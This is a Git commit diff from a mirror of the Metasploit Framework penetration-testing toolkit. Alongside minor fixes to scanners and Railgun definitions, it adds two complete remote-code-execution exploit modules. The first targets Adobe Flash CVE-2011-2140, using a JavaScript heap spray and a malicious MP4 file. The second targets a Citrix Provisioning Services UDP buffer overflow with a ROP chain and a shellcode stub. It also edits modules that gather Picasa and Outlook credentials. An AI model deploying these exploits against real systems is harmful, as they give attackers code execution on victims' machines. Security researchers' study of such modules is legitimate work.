infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge branch 'master' of git://github.com/rapid7/metasploit-framework

unstable
Steve Tornio 2012-02-10 06:51:02 -06:00
parent adafe6f722 fe69a27bf1
commit 1a240648fa
21 changed files with 718 additions and 235 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

2
external/source/meterpreter/source/extensions/networkpug/networkpug.c vendored
View File

@ -178,7 +178,7 @@ void free_networkpug(NetworkPug *np, int close_channel, int destroy_channel)
cont = __atomic_swap(0, &np->active);
if(! cont) {
dprintf("Seems the pug at %p was already set free");
dprintf("Seems the pug at %p was already set free", &np);
return;
}

11
lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_netapi32.rb
View File

@ -21,6 +21,17 @@ class Def_netapi32
["PDWORD","lpNameBugger","out"],
["PDWORD","BufferType","out"]
])
dll.add_function('NetServerEnum', 'DWORD',[
["PWCHAR","servername","in"],
["DWORD","level","in"],
["PDWORD","bufptr","out"],
["DWORD","prefmaxlen","in"],
["PDWORD","entriesread","out"],
["PDWORD","totalentries","out"],
["DWORD","servertype","in"],
["PWCHAR","domain","in"],
["DWORD","resume_handle","inout"]
])
return dll
end

6
lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_ws2_32.rb
View File

@ -18,6 +18,12 @@ class Def_ws2_32
["PDWORD","ppResult","out"]
])
dll.add_function('gethostbyaddr', 'DWORD', [
['PCHAR', 'addr', 'in'],
['DWORD','len','in'],
['DWORD','type','in']
])
dll.add_function('WSAAccept', 'DWORD',[
["DWORD","s","in"],
["PBLOB","addr","inout"],

1
lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb
View File

@ -83,6 +83,7 @@ class Console::CommandDispatcher::Core
end
def cmd_background
print_status "Backgrounding session #{client.name}..."
client.interacting = false
end

22
modules/auxiliary/admin/natpmp/natpmp_map.rb
View File

@ -8,7 +8,7 @@ class Metasploit3 < Msf::Auxiliary
def initialize
super(
'Name' => 'NAT-PMP port mapper',
'Name' => 'NAT-PMP Port Mapper',
'Description' => 'Map (forward) TCP and UDP ports on NAT devices using NAT-PMP',
'Author' => 'Jon Hart <jhart[at]spoofed.org>',
'License' => MSF_LICENSE
@ -30,9 +30,9 @@ class Metasploit3 < Msf::Auxiliary
def run_host(host)
begin
udp_sock = Rex::Socket::Udp.create(
{ 'LocalHost' => datastore['CHOST'] || nil,
'Context' => {'Msf' => framework, 'MsfExploit' => self}
udp_sock = Rex::Socket::Udp.create({
'LocalHost' => datastore['CHOST'] || nil,
'Context' => {'Msf' => framework, 'MsfExploit' => self}
})
add_socket(udp_sock)
@ -96,11 +96,13 @@ class Metasploit3 < Msf::Auxiliary
)
# report the external port as being open
report_service(
:host => external_address,
:port => external_port,
:proto => datastore['PROTOCOL'].to_s.downcase,
:state => Msf::ServiceState::Open
)
if inside_workspace_boundary(external_address)
report_service(
:host => external_address,
:port => external_port,
:proto => datastore['PROTOCOL'].to_s.downcase,
:state => Msf::ServiceState::Open
)
end
end
end

26
modules/auxiliary/gather/natpmp_external_address.rb
View File

@ -8,7 +8,7 @@ class Metasploit3 < Msf::Auxiliary
def initialize
super(
'Name' => 'NAT-PMP External address scanner',
'Name' => 'NAT-PMP External Address Scanner',
'Description' => 'Scan NAT devices for their external address using NAT-PMP',
'Author' => 'Jon Hart <jhart[at]spoofed.org>',
'License' => MSF_LICENSE
@ -25,15 +25,15 @@ class Metasploit3 < Msf::Auxiliary
def run_host(host)
begin
udp_sock = Rex::Socket::Udp.create(
{ 'LocalHost' => datastore['CHOST'] || nil,
'Context' => {'Msf' => framework, 'MsfExploit' => self}
udp_sock = Rex::Socket::Udp.create({
'LocalHost' => datastore['CHOST'] || nil,
'Context' => {'Msf' => framework, 'MsfExploit' => self}
})
add_socket(udp_sock)
print_status "#{host}:#{datastore['RPORT']} - NATPMP - Probing for external address" if (datastore['VERBOSE'])
udp_sock.sendto(Rex::Proto::NATPMP.external_address_request, host, datastore['RPORT'].to_i, 0)
while (r = udp_sock.recvfrom(12, 0.25) and r[1])
while (r = udp_sock.recvfrom(12, 1.0) and r[1])
handle_reply(host, r)
end
rescue ::Interrupt
@ -41,7 +41,7 @@ class Metasploit3 < Msf::Auxiliary
rescue ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionRefused
nil
rescue ::Exception => e
print_error("Unknown error: #{e.class} #{e}")
print_error("#{host}:#{datastore['RPORT']} Unknown error: #{e.class} #{e}")
end
end
@ -65,18 +65,20 @@ class Metasploit3 < Msf::Auxiliary
)
# also report its external address as alive
report_host(
:host => external_address,
:state => Msf::HostState::Alive
)
if inside_workspace_boundary(external_address)
report_host(
:host => external_address,
:state => Msf::HostState::Alive
)
end
# report NAT-PMP as being open
report_service(
:host => host,
:port => pkt[2],
:proto => 'udp',
:name => 'natpmp',
:state => Msf::ServiceState::Open
:name => 'natpmp',
:state => Msf::ServiceState::Open
)
end
end

21
modules/auxiliary/scanner/discovery/ipv6_multicast_ping.rb
View File

@ -1,5 +1,5 @@
##
# $Id$
# $Id: ipv6_multicast_ping.rb 13962 2011-10-17 02:42:01Z todb $
##
require 'msf/core'
@ -13,7 +13,7 @@ class Metasploit3 < Msf::Auxiliary
def initialize
super(
'Name' => 'IPv6 Link Local/Node Local Ping Discovery',
'Version' => '$Revision$',
'Version' => '$Revision: 13962 $',
'Description' => %q{
Send a ICMPv6 ping request to all default multicast addresses, and wait to see who responds.
},
@ -69,10 +69,19 @@ class Metasploit3 < Msf::Auxiliary
# Figure out our source address by the link-local interface
shost = ipv6_link_address
ping6("FF01::1", {"DMAC" => dmac, "SHOST" => shost, "WAIT" => false})
ping6("FF01::2", {"DMAC" => dmac, "SHOST" => shost, "WAIT" => false})
ping6("FF02::1", {"DMAC" => dmac, "SHOST" => shost, "WAIT" => false})
ping6("FF02::2", {"DMAC" => dmac, "SHOST" => shost, "WAIT" => false})
# m-1-k-3: added some more multicast addresses from wikipedia: https://en.wikipedia.org/wiki/Multicast_address#IPv6
ping6("FF01::1", {"DMAC" => dmac, "SHOST" => shost, "WAIT" => false}) #node-local all nodes
ping6("FF01::2", {"DMAC" => dmac, "SHOST" => shost, "WAIT" => false}) #node-local all routers
ping6("FF02::1", {"DMAC" => dmac, "SHOST" => shost, "WAIT" => false}) #All nodes on the local network segment
ping6("FF02::2", {"DMAC" => dmac, "SHOST" => shost, "WAIT" => false}) #All routers on the local network segment
ping6("FF02::5", {"DMAC" => dmac, "SHOST" => shost, "WAIT" => false}) #OSPFv3 AllSPF routers
ping6("FF02::6", {"DMAC" => dmac, "SHOST" => shost, "WAIT" => false}) #OSPFv3 AllDR routers
ping6("FF02::9", {"DMAC" => dmac, "SHOST" => shost, "WAIT" => false}) #RIP routers
ping6("FF02::a", {"DMAC" => dmac, "SHOST" => shost, "WAIT" => false}) #EIGRP routers
ping6("FF02::d", {"DMAC" => dmac, "SHOST" => shost, "WAIT" => false}) #PIM routers
ping6("FF02::16", {"DMAC" => dmac, "SHOST" => shost, "WAIT" => false}) #MLDv2 reports (defined in RFC 3810)
ping6("ff02::1:2", {"DMAC" => dmac, "SHOST" => shost, "WAIT" => false}) #All DHCP servers and relay agents on the local network site (defined in RFC 3315)
ping6("ff05::1:3", {"DMAC" => dmac, "SHOST" => shost, "WAIT" => false}) #All DHCP servers on the local network site (defined in RFC 3315)
# Listen for host advertisments
print_status("Listening for responses...")

8
modules/auxiliary/scanner/discovery/ipv6_neighbor.rb
View File

@ -132,6 +132,14 @@ class Metasploit3 < Msf::Auxiliary
next if not addr
print_status(sprintf(" %16s maps to %s",addr[:ipv4], addr[:ipv6]))
report_note(
:host => addr[:ipv4],
:proto => 'IP',
:sname => 'all',
:type => 'ipv4.ipv6.mapping',
:data => "system with IPv4 address #{addr[:ipv4]} matches to IPv6 address #{addr[:ipv6]}"
) # with this we have the results in our database
end
end

26
modules/auxiliary/scanner/natpmp/natpmp_portscan.rb
View File

@ -10,7 +10,7 @@ class Metasploit3 < Msf::Auxiliary
def initialize
super(
'Name' => 'NAT-PMP External port scanner',
'Name' => 'NAT-PMP External Port Scanner',
'Description' => 'Scan NAT devices for their external listening ports using NAT-PMP',
'Author' => 'Jon Hart <jhart[at]spoofed.org>',
'License' => MSF_LICENSE
@ -27,9 +27,9 @@ class Metasploit3 < Msf::Auxiliary
def run_host(host)
begin
udp_sock = Rex::Socket::Udp.create(
{ 'LocalHost' => datastore['CHOST'] || nil,
'Context' => {'Msf' => framework, 'MsfExploit' => self} }
udp_sock = Rex::Socket::Udp.create({
'LocalHost' => datastore['CHOST'] || nil,
'Context' => {'Msf' => framework, 'MsfExploit' => self} }
)
add_socket(udp_sock)
print_status "Scanning #{datastore['PROTOCOL']} ports #{datastore['PORTS']} on #{host} using NATPMP" if (datastore['VERBOSE'])
@ -52,13 +52,13 @@ class Metasploit3 < Msf::Auxiliary
# send one request to clear the mapping if *we've* created it before
clear_req = Rex::Proto::NATPMP.map_port_request(port, port, Rex::Proto::NATPMP.const_get(datastore['PROTOCOL']), 0)
udp_sock.sendto(clear_req, host, datastore['RPORT'].to_i, 0)
while (r = udp_sock.recvfrom(16, 0.25) and r[1])
while (r = udp_sock.recvfrom(16, 1.0) and r[1])
end
# now try the real mapping
map_req = Rex::Proto::NATPMP.map_port_request(port, port, Rex::Proto::NATPMP.const_get(datastore['PROTOCOL']), 1)
udp_sock.sendto(map_req, host, datastore['RPORT'].to_i, 0)
while (r = udp_sock.recvfrom(16, 0.25) and r[1])
while (r = udp_sock.recvfrom(16, 1.0) and r[1])
handle_reply(host, external_address, r)
end
end
@ -98,12 +98,14 @@ class Metasploit3 < Msf::Auxiliary
print_status("#{external_addr} - #{int}/#{protocol} #{state} because of code #{result} response") if (datastore['DEBUG'])
end
report_service(
:host => external_addr,
:port => int,
:proto => protocol,
:state => state
)
if inside_workspace_boundary(external_addr)
report_service(
:host => external_addr,
:port => int,
:proto => protocol,
:state => state
)
end
report_service(
:host => host,

326
modules/exploits/windows/browser/adobe_flash_sps.rb Normal file
View File

@ -0,0 +1,326 @@
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::HttpServer::HTML
def initialize(info={})
super(update_info(info,
'Name' => "Adobe Flash Player MP4 SequenceParameterSetNALUnit Buffer Overflow",
'Description' => %q{
This module exploits a vulnerability found in Adobe Flash Player's Flash10u.ocx
component. When processing a MP4 file (specifically the Sequence Parameter Set),
Flash will see if pic_order_cnt_type is equal to 1, which sets the
num_ref_frames_in_pic_order_cnt_cycle field, and then blindly copies data in
offset_for_ref_frame on the stack, which allows arbitrary remote code execution
under the context of the user. Numerous reports also indicate that this
vulnerability has been exploited in the wild.
Please note that the exploit requires a SWF media player in order to trigger
the bug, which currently isn't included in the framework. However, software such
as Longtail SWF Player is free for non-commercial use, and is easily obtainable.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Alexander Gavrun', #RCA
'Abysssec', #PoC
'sinn3r' #Metasploit
],
'References' =>
[
[ 'CVE', '2011-2140' ],
[ 'BID', '49083' ],
[ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-11-276/' ],
[ 'URL', 'http://www.kahusecurity.com/2011/cve-2011-2140-caught-in-the-wild/' ],
[ 'URL', 'http://www.adobe.com/support/security/bulletins/apsb11-21.html' ],
[ 'URL', 'http://0x1byte.blogspot.com/2011/11/analysis-of-cve-2011-2140-adobe-flash.html' ],
[ 'URL', 'http://www.abysssec.com/blog/2012/01/31/exploiting-cve-2011-2140-another-flash-player-vulnerability/' ]
],
'Payload' =>
{
'BadChars' => "\x00",
'StackAdjustment' => -3500
},
'DefaultOptions' =>
{
'ExitFunction' => "seh",
'InitialAutoRunScript' => 'migrate -f'
},
'Platform' => 'win',
'Targets' =>
[
[ 'Automatic', {} ],
[ 'IE 6 on Windows XP SP3', { 'Offset' => '0x600' } ], #0x5f4 = spot on
[ 'IE 7 on Windows XP SP3 / Vista', { 'Offset' => '0x600' } ]
],
'Privileged' => false,
'DisclosureDate' => "Aug 9 2011",
'DefaultTarget' => 0))
register_options(
[
OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation']),
OptString.new('SWF_PLAYER_URI', [true, 'Path to the SWF Player'])
], self.class)
end
def get_target(agent)
#If the user is already specified by the user, we'll just use that
return target if target.name != 'Automatic'
if agent =~ /NT 5\.1/ and agent =~ /MSIE 6/
return targets[1]
elsif agent =~ /MSIE 7/
return targets[2]
else
return nil
end
end
def on_request_uri(cli, request)
agent = request.headers['User-Agent']
my_target = get_target(agent)
# Avoid the attack if the victim doesn't have the same setup we're targeting
if my_target.nil?
print_error("Browser not supported, will not launch attack: #{agent.to_s}: #{cli.peerhost}:#{cli.peerport}")
send_not_found(cli)
return
end
# The SWF requests our MP4 trigger
if request.uri =~ /\.mp4$/
print_status("Sending MP4 to #{cli.peerhost}:#{cli.peerport}...")
#print_error("Sorry, not sending you the mp4 for now")
#send_not_found(cli)
send_response(cli, @mp4, {'Content-Type'=>'video/mp4'})
return
end
# Set payload depending on target
p = payload.encoded
js_code = Rex::Text.to_unescape(p, Rex::Arch.endian(target.arch))
js_nops = Rex::Text.to_unescape("\x0c"*4, Rex::Arch.endian(target.arch))
js = <<-JS
var heap_obj = new heapLib.ie(0x20000);
var code = unescape("#{js_code}");
var nops = unescape("#{js_nops}");
while (nops.length < 0x80000) nops += nops;
var offset = nops.substring(0, #{my_target['Offset']});
var shellcode = offset + code + nops.substring(0, 0x800-code.length-offset.length);
while (shellcode.length < 0x40000) shellcode += shellcode;
var block = shellcode.substring(0, (0x80000-6)/2);
heap_obj.gc();
for (var i=1; i < 0x300; i++) {
heap_obj.alloc(block);
}
JS
js = heaplib(js, {:noobfu => true})
if datastore['OBFUSCATE']
js = ::Rex::Exploitation::JSObfu.new(js)
js.obfuscate
end
myhost = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address('50.50.50.50') : datastore['SRVHOST']
mp4_uri = "http://#{myhost}:#{datastore['SRVPORT']}#{get_resource()}/#{rand_text_alpha(rand(6)+3)}.mp4"
swf_uri = "#{datastore['SWF_PLAYER_URI']}?autostart=true&image=video.jpg&file=#{mp4_uri}"
html = %Q|
<html>
<head>
<script>
#{js}
</script>
</head>
<body>
<object width="1" height="1" type="application/x-shockwave-flash" data="#{swf_uri}">
<param name="movie" value="#{swf_uri}">
</object>
</body>
</html>
|
html = html.gsub(/^\t\t/, '')
print_status("Sending html to #{cli.peerhost}:#{cli.peerport}...")
send_response(cli, html, {'Content-Type'=>'text/html'})
end
def exploit
@mp4 = create_mp4
super
end
def create_mp4
ftypAtom = "\x00\x00\x00\x20" #Size
ftypAtom << "ftypisom"
ftypAtom << "\x00\x00\x02\x00"
ftypAtom << "isomiso2avc1mp41"
mdatAtom = "\x00\x00\x00\x10" #Size
mdatAtom << "mdat"
mdatAtom << "\x00\x00\x02\x8B\x06\x05\xFF\xFF"
moovAtom1 = "\x00\x00\x08\x83" #Size
moovAtom1 << "moov" #Move header box header
moovAtom1 << "\x00\x00\x00"
moovAtom1 << "lmvhd" # Type
moovAtom1 << "\x00\x00\x00\x00" # Version/Flags
moovAtom1 << "\x7C\x25\xB0\x80\x7C\x25\xB0\x80" # Creation time
moovAtom1 << "\x00\x00\x03\xE8" # Time scale
moovAtom1 << "\x00\x00\x2F\x80" # Duration
moovAtom1 << "\x00\x01\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
moovAtom1 << "\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x40\x00\x00\x00\x00\x00\x00\x00"
moovAtom1 << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x02\xFA"
moovAtom1 << "trak" # Track box header
moovAtom1 << "\x00\x00\x00\x5C"
moovAtom1 << "tkhd"
moovAtom1 << "\x00\x00\x00\x0F"
moovAtom1 << "\x7C\x25\xB0\x80\x7C\x25\xB0\x80" # Creation time
moovAtom1 << "\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x2E\xE0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
moovAtom1 << "\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
moovAtom1 << "\x00\x00\x00\x00\x40\x00\x00\x00\x01\x42\x00\x00\x01\x42\x00\x00\x00\x00\x02"
moovAtom1 << "rmdia"
moovAtom1 << "\x00\x00\x00\x20" # Size
moovAtom1 << "mdhd" # Media header box
moovAtom1 << "\x00\x00\x00\x00" # Version/Flags
moovAtom1 << "\x7C\x25\xB0\x80\x7C\x25\xB0\x80" # Creation time
moovAtom1 << "\x00\x00\x00\x01" # Time scale
moovAtom1 << "\x00\x00\x00\x0C" # Duration
moovAtom1 << "\x55\xC4\x00\x00"
moovAtom1 << "\x00\x00\x00\x2D" # Size
moovAtom1 << "hdlr" # Handler Reference header
moovAtom1 << "\x00\x00\x00\x00\x00\x00\x00\x00"
moovAtom1 << "vide" # Handler type
moovAtom1 << "\x00\x00\x00\x00\x00"
moovAtom1 << "\x00\x00\x00\x00\x00\x00\x00"
moovAtom1 << "VideoHandler" # Handler name
moovAtom1 << "\x00\x00\x00\x02\x1D"
moovAtom1 << "minf"
moovAtom1 << "\x00\x00\x00\x14"
moovAtom1 << "vmhd"
moovAtom1 << "\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x24"
moovAtom1 << "dinf" # Data information box header
moovAtom1 << "\x00\x00\x00\x1c"
moovAtom1 << "dref" # Data reference box
moovAtom1 << "\x00\x00\x00\x00\x00\x00\x00\x01"
moovAtom1 << "\x00\x00\x00\x0C" # Size
moovAtom1 << "url " # Data entry URL box
moovAtom1 << "\x00\x00\x00\x01" # Location / version / flags
moovAtom1 << "\x00\x00\x09\xDD" # Size
moovAtom1 << "stbl"
moovAtom1 << "\x00\x00\x08\x99"
moovAtom1 << "stsd"
moovAtom1 << "\x00\x00\x00\x00\x00\x00\x00\x01"
moovAtom1 << "\x00\x00\x08\x89" # Size
moovAtom1 << "avc1"
moovAtom1 << "\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
moovAtom1 << "\x01\x42" # Width
moovAtom1 << "\x01\x42" # Height
moovAtom1 << "\x00\x48\x00\x00\x00\x48\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
moovAtom1 << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
moovAtom1 << "\x18" # Depth
moovAtom1 << "\xFF\xFF"
moovAtom1 << "\x00\x00\x08\x33" # Size
moovAtom1 << "avcC"
moovAtom1 << "\x01" # Config version
moovAtom1 << "\x64" # Avc profile indication
moovAtom1 << "\x00" # Compatibility
moovAtom1 << "\x15" # Avc level indication
moovAtom1 << "\xFF\xE1"
# Although the fields have different values, they all become 0x0c0c0c0c
# in memory.
cycle = "\x00\x00\x00"
cycle << "\x30\x30\x30\x30" #6th
cycle << "\x00\x00\x00"
cycle << "\x18\x18\x18\x18" #7th
cycle << "\x00\x00\x00"
cycle << "\x0c\x0c\x0c\x0c" #8th
cycle << "\x00\x00\x00"
cycle << "\x06\x06\x06\x06" #1st
cycle << "\x00\x00\x00"
cycle << "\x03\x03\x03\x03"
cycle << "\x00\x00\x00\x01\x81\x81\x81\x80\x00\x00\x00"
cycle << "\xc0\xc0\xc0\xc0" # 4th
cycle << "\x00\x00\x00"
cycle << "\x60\x60\x60\x60"
spsunit = "\x08\x1A\x67\x70\x34\x32\x74\x70\x00\x00\xAF\x88\x88\x84\x00\x00\x03\x00\x04\x00\x00\x03\x00\x3F\xFF\xFF\xFF\xFF\xFF"
spsunit << "\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"
spsunit << "\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFC"
spsunit << cycle * 35
spsunit << "\x00\x00\x00\x30\x30\x03\x03\x03\x03\x00\x00\x00\xB2\x2C"
moovAtom2 = "\x00\x00\x00\x18"
moovAtom2 << "stts"
moovAtom2 << "\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x0C\x00\x00\x00\x01"
moovAtom2 << "\x00\x00\x00\x14"
moovAtom2 << "stss"
moovAtom2 << "\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00"
moovAtom2 << "pctts"
moovAtom2 << "\x00\x00\x00\x00\x00\x00"
moovAtom2 << "\x00\x0C\x00\x00\x00\x01\x00\x00\x00\x02\x00\x00\x00\x01\x00\x00\x00\x03\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00"
moovAtom2 << "\x01\x00\x00\x00\x03\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x05\x00\x00\x00\x01\x00\x00\x00\x02"
moovAtom2 << "\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x03\x00\x00\x00\x01\x00"
moovAtom2 << "\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x02"
moovAtom2 << "\x00\x00\x00\x1C"
moovAtom2 << "stsc"
moovAtom2 << "\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x01"
moovAtom2 << "\x00\x00\x00\x44"
moovAtom2 << "stsz"
moovAtom2 << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
moovAtom2 << "\x0C\x00\x00\x2F\x8D\x00\x00\x0C\xFE\x00\x00\x04\x42\x00\x00\x0B\x20\x00\x00\x04\x58\x00\x00\x07\x19\x00\x00\x07"
moovAtom2 << "\x63\x00\x00\x02\xD6\x00\x00\x03\xC1\x00\x00\x0A\xDF\x00\x00\x04\x9B\x00\x00\x09\x39"
moovAtom2 << "\x00\x00\x00\x40"
moovAtom2 << "stco"
moovAtom2 << "\x00\x00\x00\x00\x00\x00\x00\x0C\x00\x00\x00\x30\x00\x00\x2F\xBD\x00\x00\x3D\x8A\x00\x00\x48\x19\x00\x00\x5A\xF4"
moovAtom2 << "\x00\x00\x66\x1F\x00\x00\x73\xEA\x00\x00\x82\x32\x00\x00\x8A\xFA\x00\x00\x95\x51\x00\x00\xA7\x16\x00\x00\xB1\xE5"
moovAtom = moovAtom1 + spsunit + moovAtom2
m = ftypAtom + mdatAtom + moovAtom
return m
end
end
=begin
C:\WINDOWS\system32\Macromed\Flash\Flash10u.ocx
Flash10u+0x5b4e8:
Missing image name, possible paged-out or corrupt data.
1f06b4e8 8901 mov dword ptr [ecx],eax ds:0023:020c0000=00905a4d
0:008> !exchain
020bfdfc: <Unloaded_ud.drv>+c0c0c0b (0c0c0c0c)
ECX points to 0x0c0c0c0c at the time of the crash:
0:008> r
eax=00000000 ebx=00000000 ecx=0c0c0c0c edx=7c9032bc esi=00000000 edi=00000000
eip=0c0c0c0c esp=020befa8 ebp=020befc8 iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00050246
<Unloaded_ud.drv>+0xc0c0c0b:
0c0c0c0c ?? ???
Example of SWF player URI:
http://www.jeroenwijering.com/embed/mediaplayer.swf
To-do:
IE 8 target
=end

116
modules/exploits/windows/misc/citrix_streamprocess_data_msg.rb Normal file
View File

@ -0,0 +1,116 @@
##
# $Id: $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::Udp
def initialize(info = {})
super(update_info(info,
'Name' => 'Citrix Provisioning Services 5.6 SP1 Streamprocess Opcode 0x40020000 Buffer Overflow',
'Description' => %q{
This module exploits a remote buffer overflow in the Citrix Provisioning Services
5.6 SP1 (without Hotfix CPVS56SP1E043) by sending a malformed packet to the
6905/UDP port. The module has been successfully tested on Windows Server 2003 SP2,
Windows 7, and Windows XP SP3.
},
'License' => MSF_LICENSE,
'Author' =>
[
'AbdulAziz Hariri', # Initial discovery via ZDI
'alino <26alino[at]gmail.com>' # Metasploit module
],
'Version' => '$Revision: $',
'References' =>
[
['BID', '49803'],
['URL', 'http://www.zerodayinitiative.com/advisories/ZDI-12-009'],
['URL', 'http://support.citrix.com/article/CTX130846']
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
'InitialAutoRunScript' => 'migrate -f',
},
'Payload' =>
{
'BadChars' => "\x00",
'EncoderOptions' => {'BufferRegister'=>'ECX'},
},
'Platform' => ['win'],
'Targets' =>
[
[ 'Citrix Provisioning Services 5.6 SP1',
{
'Offset' => 2012,
'Ret' => 0x0045403a # ADD ESP,664; RETN 04 streamprocess.exe
}
]
],
'Privileged' => true,
'DisclosureDate' => 'Nov 04 2011', #CTX130846 creation date
'DefaultTarget' => 0))
register_options([Opt::RPORT(6905)], self.class)
end
def exploit
packet = "\x00\x00\x02\x40" # DATA MSG
packet << rand_text_alpha_upper(18)
packet << "\x00\x00\x00\x00" # Length
packet << rand_text_alpha_upper(target['Offset'])
packet << [target.ret].pack('V')
rop_nop = [0x004a072c].pack('V') * 38 # RETN streamprocess.exe
rop_gadgets =
[
0x0045b141, # POP EAX; RETN streamprocess.exe
0x1009a1bc, # VirtualProtect()
0x00436d44, # MOV EAX,DWORD PTR DS:[EAX]; RETN streamprocess.exe
0x004b0bbe, # XCHG EAX,ESI; RETN streamprocess.exe
0x004ad0cf, # POP EBP; RETN streamprocess.exe
0x00455d9d, # PUSH ESP; RETN streamprocess.exe
0x00497f5a, # POP EAX; RETN streamprocess.exe
0xfffff9d0, # dwSize
0x00447669, # NEG EAX; RETN streamprocess.exe
0x004138a7, # ADD EBX,EAX; XOR EAX,EAX; RETN streamprocess.exe
0x00426305, # POP ECX; RETN streamprocess.exe
0x00671fb9, # lpflOldProtect
0x004e41e6, # POP EDI; RETN streamprocess.exe
0x0040f004, # RETN streamprocess.exe
0x00495c05, # POP EAX; RETN streamprocess.exe
0xffffffc0, # flNewProtect
0x0042c79a, # NEG EAX; RETN streamprocess.exe
0x0049b676, # XCHG EAX,EDX; RETN streamprocess.exe
0x0045c1fa, # POP EAX; RETN streamprocess.exe
0x90909090, # NOP
0x00435bbe, # PUSHAD; RETN streamprocess.exe
].pack("V*")
packet[258, rop_nop.length] = rop_nop
packet[410, rop_gadgets.length] = rop_gadgets
packet[494, 10] = "\xeb\x03\x59\xff\xd1\xe8\xf8\xff\xff\xff"
packet[504, payload.encoded.length] = payload.encoded
print_status("Trying target #{target.name}...")
connect_udp
udp_sock.put(packet)
handler
disconnect_udp
end
end

14
modules/post/windows/escalate/net_runtime_modify.rb
View File

@ -124,16 +124,10 @@ class Metasploit3 < Msf::Post
def init_railgun
begin
# load the dlls we need
if session.railgun.get_dll("advapi32").nil?
print_status("Loading advapi.dll...")
session.railgun.add_dll("advapi32", 'C:\\WINDOWS\\system32\\advapi32.dll')
end
if session.railgun.advapi32.functions['DeleteService'].nil?
session.railgun.add_function( 'advapi32', 'DeleteService','BOOL',[
[ "DWORD", "hService", "in" ]])
end
rg = session.railgun
if (!rg.get_dll('advapi32'))
rg.add_dll('advapi32')
end
rescue Exception => e
print_error("Could not initalize railgun")
print_error("Railgun Error: #{e}")

7
modules/post/windows/escalate/service_permissions.rb
View File

@ -110,12 +110,7 @@ class Metasploit3 < Msf::Post
end
#attempt to make new service
client.railgun.kernel32.LoadLibraryA("advapi32.dll")
client.railgun.get_dll('advapi32')
client.railgun.add_function( 'advapi32', 'DeleteService','BOOL',[
[ "DWORD", "hService", "in" ]
])
#SERVICE_NO_CHANGE 0xffffffff for DWORDS or NULL for pointer values leaves the current config
print_status("Trying to add a new service...")

12
modules/post/windows/gather/credentials/enum_picasa_pwds.rb
View File

@ -45,18 +45,6 @@ class Metasploit3 < Msf::Post
if (!rg.get_dll('crypt32'))
rg.add_dll('crypt32')
end
if (!rg.crypt32.functions["CryptUnprotectData"])
rg.add_function("crypt32", "CryptUnprotectData", "BOOL", [
["PBLOB","pDataIn", "in"],
["PWCHAR", "szDataDescr", "out"],
["PBLOB", "pOptionalEntropy", "in"],
["PDWORD", "pvReserved", "in"],
["PBLOB", "pPromptStruct", "in"],
["DWORD", "dwFlags", "in"],
["PBLOB", "pDataOut", "out"]
])
end
end

12
modules/post/windows/gather/credentials/outlook.rb
View File

@ -41,18 +41,6 @@ class Metasploit3 < Msf::Post
if (!rg.get_dll('crypt32'))
rg.add_dll('crypt32')
end
if (!rg.crypt32.functions["CryptUnprotectData"])
rg.add_function("crypt32", "CryptUnprotectData", "BOOL", [
["PBLOB","pDataIn", "in"],
